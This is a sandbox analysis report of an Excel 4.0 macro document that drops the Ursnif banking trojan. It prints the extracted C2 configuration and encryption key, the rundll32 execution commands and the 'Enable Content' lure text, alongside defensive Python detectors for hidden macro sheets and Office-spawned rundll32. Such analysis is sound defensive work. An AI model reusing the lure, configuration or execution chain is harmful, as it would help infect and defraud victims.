Analysis Report document-1245492889.xls

Overview

General Information

Sample Name: document-1245492889.xls
Analysis ID: 383157
MD5: e30c71417d7675c13ca725d3bb4172eb
SHA1: 80350061fb497c3fc79ac2cd4f8a315aceae412e
SHA256: 05d2f75e43502476f32925c3f8ca82245c4f5433c4d405779e6fd178cd37ea13
Detection

Hidden Macro 4.0 Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
Office process drops PE file
Yara detected hidden Macro 4.0 in Excel
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2400 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2316 cmdline: rundll32 ..\fikftkm.thj,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2324 cmdline: rundll32 ..\fikftkm.thj1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2880 cmdline: rundll32 ..\fikftkm.thj2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2920 cmdline: rundll32 ..\fikftkm.thj2,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
    • rundll32.exe (PID: 1788 cmdline: rundll32 ..\fikftkm.thj3,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2988 cmdline: rundll32 ..\fikftkm.thj4,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup
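The process tree above is the part of this report worth turning into a detection: EXCEL.EXE launching rundll32.exe on a relative path whose extension is not .dll, calling the DllRegisterServer export, and the Sigma Overview below records that no Sigma rule matched this run. The following Python is an added example, not part of the report or of Joe Sandbox. Events are dicts in a normalised Sysmon Event ID 1 shape (the field names are an assumption); the two Excel-spawned events copy the command lines from the Startup tree, the benign events are constructed.

```python
"""Flag the Office -> rundll32 DllRegisterServer chain shown in this report's process tree.

Added example, not part of the Joe Sandbox report. Events are dicts in a normalised
Sysmon Event ID 1 shape (field names are an assumption). The two Excel-spawned
events copy the command lines from the Startup tree; the benign ones are constructed.
"""
import ntpath
import re

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Extensions a legitimate rundll32 module normally carries
DLL_EXTENSIONS = {".dll", ".ocx", ".cpl", ".ax", ".drv"}
# rundll32 [path\]module[,export] [args]; the module may be double-quoted
RUNDLL32_RE = re.compile(
    r'rundll32(?:\.exe)?\s+"?(?P<module>[^",\s]+)"?\s*(?:,\s*(?P<export>\S+))?', re.IGNORECASE)


def parse_rundll32(command_line):
    """Return (module, export) from a rundll32 command line, or None if it does not parse."""
    m = RUNDLL32_RE.search(command_line)
    if not m:
        return None
    return m.group("module"), (m.group("export") or "")


def evaluate(event):
    """Return the reasons a process-creation event looks like this sample's chain ([] = clean)."""
    if ntpath.basename(event["image"]).lower() != "rundll32.exe":
        return []
    parsed = parse_rundll32(event["command_line"])
    if parsed is None:
        return ["rundll32 with unparseable command line"]
    module, export = parsed
    ext = ntpath.splitext(module)[1].lower()
    reasons = []
    parent = ntpath.basename(event["parent_image"]).lower()
    if parent in OFFICE_IMAGES:
        reasons.append("spawned by Office process %s" % parent)
    if not ntpath.isabs(module):
        reasons.append("module given as relative path %s" % module)
    if ext not in DLL_EXTENSIONS:
        reasons.append("module extension %s is not a DLL extension" % (ext or "<none>"))
    if export.lower() == "dllregisterserver" and ext not in DLL_EXTENSIONS:
        reasons.append("DllRegisterServer called on a non-DLL file")
    return reasons


def triage(events):
    """Return [(pid, reasons)] for every event that produced at least one reason."""
    hits = []
    for ev in events:
        reasons = evaluate(ev)
        if reasons:
            hits.append((ev["pid"], reasons))
    return hits


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
RUNDLL32 = r"C:\Windows\System32\rundll32.exe"

SAMPLE_EVENTS = [
    # copied from the report's Startup tree
    {"pid": 2316, "parent_image": EXCEL, "image": RUNDLL32,
     "command_line": r"rundll32 ..\fikftkm.thj,DllRegisterServer"},
    {"pid": 2880, "parent_image": EXCEL, "image": RUNDLL32,
     "command_line": r"rundll32 ..\fikftkm.thj2,DllRegisterServer"},
    # constructed benign activity
    {"pid": 4100, "parent_image": r"C:\Windows\explorer.exe", "image": RUNDLL32,
     "command_line": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"pid": 4200, "parent_image": r"C:\Windows\System32\svchost.exe", "image": RUNDLL32,
     "command_line": r'rundll32.exe "C:\Windows\System32\advpack.dll",LaunchINFSection'},
    {"pid": 4300, "parent_image": EXCEL, "image": r"C:\Windows\splwow64.exe",
     "command_line": r"C:\Windows\splwow64.exe 12288"},
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS):
        print(pid)
        for r in reasons:
            print("   ", r)
```

Each reason is reported separately rather than folded into one score so the rule can be tuned per environment: an Office parent alone is noisy in some fleets, but a relative-path module with a made-up extension handed to DllRegisterServer is not something legitimate software does.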

Malware Configuration

Threatname: Ursnif

[[{"RSA Public Key": "bUd4GFcFHo0e+ZYUbkHaTKXmZ1xEyxvy7Ha6j1WAZbQ7YvMdkqTfD1vHD2y2CmFTRrLK1w5iQroYI0mUpJ4xNknlY+BmJf4xpeJRxxK0RRNeRbW5unSB2vXqxvlTgz6vNZY+9zeztuP2jXKpIm0/s+YxWnsT7eWUtQtD38NlsAPtJdp+3rBxjzAWNKQj7wMA"},
  {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"],
   "botnet": "5566",
   "server": "12",
   "serpent_key": "10301029JSJUYDWG",
   "sleep_time": "10",
   "SetWaitableTimer_value": "0",
   "DGA_count": "10"}]]

Yara Overview

Initial Sample

Source: document-1245492889.xls
Rule: SUSP_EnableContent_String_Gen (Florian Roth): Detects suspicious string that asks to enable active content in Office Doc
Strings:
  • 0x1ed97:$e1: Enable Editing
  • 0x1edb6:$e2: Enable Content

Source: document-1245492889.xls
Rule: SUSP_Excel4Macro_AutoOpen (John Lambert @JohnLaTwC): Detects Excel4 macro use with auto open / close
Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x2aaa2:$s1: Excel
  • 0x2bb0b:$s1: Excel
  • 0x3b3c:$Auto_Open1: 18 00 17 00 AA 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Source: document-1245492889.xls
Rule: JoeSecurity_XlsWithMacro4 (Joe Security): Yara detected Xls With Macro 4.0

Source: document-1245492889.xls
Rule: JoeSecurity_HiddenMacro (Joe Security): Yara detected hidden Macro 4.0 in Excel

Memory Dumps

Source: 00000006.00000002.2275673660.0000000000270000.00000004.00000001.sdmp
Rule: JoeSecurity_Ursnif_1 (Joe Security): Yara detected Ursnif

Unpacked PEs

Source: 6.2.rundll32.exe.270000.1.raw.unpack
Rule: JoeSecurity_Ursnif_1 (Joe Security): Yara detected Ursnif

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 6.2.rundll32.exe.270000.1.raw.unpack | Malware Configuration Extractor: Ursnif (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: document-1245492889.xls | Virustotal: Detection: 54%
Source: document-1245492889.xls | Metadefender: Detection: 32%
Source: document-1245492889.xls | ReversingLabs: Detection: 18%
Machine Learning detection for dropped file
Source: C:\Users\user\fikftkm.thj2 | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 207.174.213.126:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.241.62.4:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 192.185.129.4:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 198.50.218.68:443 -> 192.168.2.22:49173 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: 0104[1].gif.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: global traffic | DNS query: name: vts.us.com
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 207.174.213.126:443
Source: Joe Sandbox View | IP Address: 207.174.213.126
Source: Joe Sandbox View | IP Address: 198.50.218.68
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: rundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: vts.us.com
Source: rundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmp | Strings found in binary or memory:
  http://investor.msn.com
  http://investor.msn.com/
  http://www.hotmail.com/oe
  http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2115568867.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109524493.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278827735.0000000001C77000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2277292535.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177880792.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2171790992.0000000001CC7000.00000002.00000001.sdmp | Strings found in binary or memory:
  http://localizability/practices/XML.asp
  http://localizability/practices/XMLConfiguration.asp
  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
  http://windowsmedia.com/redir/services.asp?WMPFriendly=true
  http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49173 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000006.00000002.2275673660.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 6.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | File source: 00000006.00000002.2275673660.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 6.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please elk 14 Ru
Source: Screenshot number: 8 | Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please ell 14 R
Source: Screenshot number: 12 | Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18
Source: Screenshot number: 12 | Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Source: Document image extraction number: 9 | Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9 | Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Screenshot number: 16 | Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 16 | Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Source: Screenshot number: 20 | Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 20 | Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Found Excel 4.0 Macro with suspicious formulas
Source: document-1245492889.xls | Initial sample: CALL
Source: document-1245492889.xls | Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: document-1245492889.xls | Initial sample: Sheet size: 4081
Source: document-1245492889.xls | Initial sample: Sheet size: 12790
Found obfuscated Excel 4.0 Macro
Source: document-1245492889.xls | Initial sample: High usage of CHAR() function: 40
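The Excel 4.0 findings above, together with the SUSP_Excel4Macro_AutoOpen hit in the Yara Overview, rest on two BIFF record types in the .xls Workbook stream: BOUNDSHEET (0x0085), which records whether each sheet is a macro sheet and whether it is hidden or very hidden, and Lbl (0x0018), which holds defined names, including the built-in Auto_Open name that makes the macro sheet run when the victim clicks Enable Content. The script below is an added example, not code from the report, Joe Sandbox, or the rule authors; it parses those two records out of a raw Workbook stream. Extracting that stream from the OLE container is assumed to be done with olefile (noted in a comment, not imported), the sample stream is constructed, and its Lbl record reuses the 21 bytes of the $Auto_Open1 Yara string listed above with a made-up 6-byte Ref3d target appended.

```python
"""Parse a BIFF8 Workbook stream for hidden Excel 4.0 macro sheets and auto-exec names.

Added example, not code from the report or from Joe Sandbox. It reads the raw
'Workbook' stream of a .xls file; pulling that stream out of the OLE container is
assumed to be done with olefile (OleFileIO(path).openstream("Workbook").read()),
which is not imported here so the script runs offline on a constructed sample.
"""
import struct

BOUNDSHEET = 0x0085  # per-sheet entry: stream offset, visibility, sheet type, name
LBL = 0x0018         # defined name; built-in names include Auto_Open and Auto_Close
BOF = 0x0809
EOF = 0x000A

SHEET_TYPES = {0x00: "worksheet", 0x01: "macro sheet", 0x02: "chart", 0x06: "VB module"}
VISIBILITY = {0: "visible", 1: "hidden", 2: "very hidden"}
# Built-in name indexes (MS-XLS 2.5.14); the name string is the single char with this code
BUILTIN_NAMES = {0x00: "Consolidate_Area", 0x01: "Auto_Open", 0x02: "Auto_Close",
                 0x03: "Extract", 0x04: "Database", 0x05: "Criteria", 0x06: "Print_Area",
                 0x07: "Print_Titles", 0x08: "Recorder", 0x09: "Data_Form",
                 0x0A: "Auto_Activate", 0x0B: "Auto_Deactivate", 0x0C: "Sheet_Title",
                 0x0D: "_FilterDatabase"}
AUTO_EXEC = {"Auto_Open", "Auto_Close", "Auto_Activate", "Auto_Deactivate"}


def iter_records(stream):
    """Yield (type, body) for each BIFF record; stop quietly on a truncated record."""
    off = 0
    while off + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, off)
        body = stream[off + 4:off + 4 + rlen]
        if len(body) < rlen:
            return
        yield rtype, body
        off += 4 + rlen


def read_xl_string(buf, cch):
    """XLUnicodeStringNoCch: one flags byte, then cch chars as Latin-1 or UTF-16LE."""
    if buf[0] & 0x01:
        return buf[1:1 + 2 * cch].decode("utf-16-le", "replace")
    return buf[1:1 + cch].decode("latin-1")


def parse_boundsheet(body):
    _pos, hs_state, dt, cch = struct.unpack_from("<IBBB", body, 0)
    return {"name": read_xl_string(body[7:], cch),
            "type": SHEET_TYPES.get(dt, "unknown(0x%02x)" % dt),
            "visibility": VISIBILITY.get(hs_state & 0x03, "unknown")}


def parse_lbl(body):
    grbit, _chkey, cch, _cce, _res, itab = struct.unpack_from("<HBBHHH", body, 0)
    builtin = bool(grbit & 0x0020)
    name_buf = body[14:]  # 10-byte header + 4 reserved length bytes precede the name
    if builtin:
        code = name_buf[1]  # flags byte, then the one-character built-in code
        name = BUILTIN_NAMES.get(code, "builtin(0x%02x)" % code)
    else:
        name = read_xl_string(name_buf, cch)
    return {"name": name, "builtin": builtin, "hidden": bool(grbit & 0x0001), "itab": itab}


def scan_workbook_stream(stream):
    """Collect sheet directory entries and defined names from the workbook globals."""
    report = {"sheets": [], "names": []}
    for rtype, body in iter_records(stream):
        if rtype == BOUNDSHEET and len(body) >= 8:
            report["sheets"].append(parse_boundsheet(body))
        elif rtype == LBL and len(body) >= 16:
            report["names"].append(parse_lbl(body))
    return report


def hidden_macro_sheets(report):
    return [s for s in report["sheets"]
            if s["type"] == "macro sheet" and s["visibility"] != "visible"]


def auto_exec_names(report):
    return [n for n in report["names"] if n["name"] in AUTO_EXEC]


# --- constructed sample stream -------------------------------------------------
def _record(rtype, body):
    return struct.pack("<HH", rtype, len(body)) + body


def _boundsheet(name, hs_state, dt):
    raw = name.encode("latin-1")
    return _record(BOUNDSHEET, struct.pack("<IBBB", 0, hs_state, dt, len(raw)) + b"\x00" + raw)


# The Lbl record's first 21 bytes are the $Auto_Open1 Yara hit from the report (type
# 0x0018, length 0x17, grbit 0x03AA with fBuiltin set, name code 0x01 = Auto_Open,
# formula starting with ptgRef3d 0x3A); the 6-byte Ref3d target is made up.
AUTO_OPEN_LBL = bytes.fromhex("18 00 17 00 AA 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A") + bytes(6)

SAMPLE_STREAM = (_record(BOF, bytes(16))
                 + _boundsheet("Sheet1", 0, 0x00)   # visible worksheet (decoy content)
                 + _boundsheet("Macro1", 2, 0x01)   # very hidden Excel 4.0 macro sheet
                 + AUTO_OPEN_LBL
                 + _record(EOF, b""))

if __name__ == "__main__":
    rep = scan_workbook_stream(SAMPLE_STREAM)
    for s in rep["sheets"]:
        print("sheet %-8s %-12s %s" % (s["name"], s["type"], s["visibility"]))
    for n in rep["names"]:
        print("name  %-16s builtin=%s hidden=%s" % (n["name"], n["builtin"], n["hidden"]))
    print("hidden macro sheets:", [s["name"] for s in hidden_macro_sheets(rep)])
    print("auto-exec names:", [n["name"] for n in auto_exec_names(rep)])
```

A "very hidden" state (hsState = 2) cannot be undone from the Excel UI, which is why it is the usual choice for macro sheets in these lures; a macro sheet in that state plus any built-in auto-exec name is enough to quarantine the file before anyone reads the formulas.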
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\fikftkm.thj2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00125F16
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00123A14
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00121B1E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0012150C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00125A25
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00125378
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00125262
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00122566
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00121967
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00122A69
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_001292B2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_001231B3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_001288BA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00123FAB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00122FAF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00121CD0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_001227D4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_001243D8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_001213C5
Source: document-1245492889.xls | OLE indicator, VBA macros: true
Source: document-1245492889.xls, type: SAMPLE | Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: document-1245492889.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLS@13/17@5/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\EDCE0000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC58F.tmp
Source: document-1245492889.xls | OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj4,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe | Automated click: OK (4 times)
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Windows\SysWOW64\rundll32.exe | Code function 6_2_00125F16, push/mov-to-[esp] sequences:
  push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax (7 times)
  push dword ptr [ebp-08h]; mov dword ptr [esp], eax (6 times)
  push dword ptr [ebp-10h]; mov dword ptr [esp], eax (5 times)
  push 00000000h; mov dword ptr [esp], edi (4 times)
  push 00000000h; mov dword ptr [esp], edx (3 times)
  push dword ptr [ebp-0Ch]; mov dword ptr [esp], edx (2 times)
  push dword ptr [ebp-08h]; mov dword ptr [esp], ecx
  push dword ptr [ebp-10h]; mov dword ptr [esp], edx
  push 00000000h; mov dword ptr [esp], eax
  push 00000000h; mov dword ptr [esp], ebp

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fikftkm.thj2Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000006.00000002.2275673660.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 6.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (27 occurrences)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX (5 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX (5 occurrences)
(NOOPENFILEERRORBOX is the SetErrorMode flag SEM_NOOPENFILEERRORBOX; it suppresses the "file not found" dialog, so a failed module load does not alert the user.)
Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 463
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_00122A69 xor edi, dword ptr fs:[00000030h] (fs:[30h] is the PEB pointer in a 32-bit process, so this instruction reads the PEB)

HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel
Source: Yara match | File source: document-1245492889.xls, type: SAMPLE (matched twice)
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
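One way to surface the hidden Excel 4.0 macro sheet that the Yara rules above fire on, written here as an added example and not code from this report or from Joe Sandbox: it walks a BIFF8 Workbook stream record by record and decodes each BoundSheet8 record, whose flag bytes carry the sheet type (0x01 = macro sheet) and the hidden state (1 = hidden, 2 = very hidden). The stream below is constructed for the example; the sheet names and offsets are invented. In a real .xls the Workbook stream sits inside the OLE container and can be read with olefile's OleFileIO(path).openstream('Workbook').

```python
import struct

# BoundSheet8 field values from the BIFF8 (Excel 97-2003) record layout.
SHEET_TYPES = {0x00: "worksheet", 0x01: "macro", 0x02: "chart", 0x06: "vba-module"}
HIDDEN_STATES = {0: "visible", 1: "hidden", 2: "very-hidden"}
BOUNDSHEET = 0x0085


def iter_records(stream: bytes):
    """Yield (record_id, body) for every BIFF record in a Workbook stream."""
    off = 0
    while off + 4 <= len(stream):
        rid, size = struct.unpack_from("<HH", stream, off)
        body = stream[off + 4: off + 4 + size]
        off += 4 + size
        yield rid, body


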